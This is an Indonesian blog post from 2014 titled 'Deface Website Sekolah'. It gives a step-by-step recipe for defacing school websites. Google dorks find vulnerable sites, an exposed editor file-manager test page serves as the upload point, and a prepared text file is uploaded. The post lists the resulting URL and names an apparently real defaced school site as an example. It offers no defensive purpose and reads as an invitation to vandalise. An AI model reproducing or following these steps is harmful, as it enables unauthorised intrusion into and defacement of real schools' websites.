Berita Terkini
Loading...
Friday, 18 April 2014

Deface Website Sekolah

00:57


1. Siapkan file txt.

2. Dork:
  • inurl:/html/siswa.php? 
  • inurl:/html/alumni.php?
  • inurl:/html/guru.php?
3. Exploit: /editor/filemanager/connectors/test.html (lalu, copas ini)


EX:
  • http://xxx.sch.id/html/siswa.php
  • http://xxx.sch.id/html/almni.php
  • http://xxx.sch.id/html/guru.php
*Sesuai Dork.

Ganti jadi: http://xxxx/editor/f...ctors/test.html

4. Ganti ASP jadi PHP.
5. Browse file txt yang sudah disiapkan -> open -> upload.
6. Hasilnya: http://xxx.sch.id/userfiles/file/nama-file.txt

Contoh hasil : http://sman1kotabaru.sch.id/userfiles/file/deface-=JEC=-.txt

0 komentar:

Post a Comment

:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

 
Toggle Footer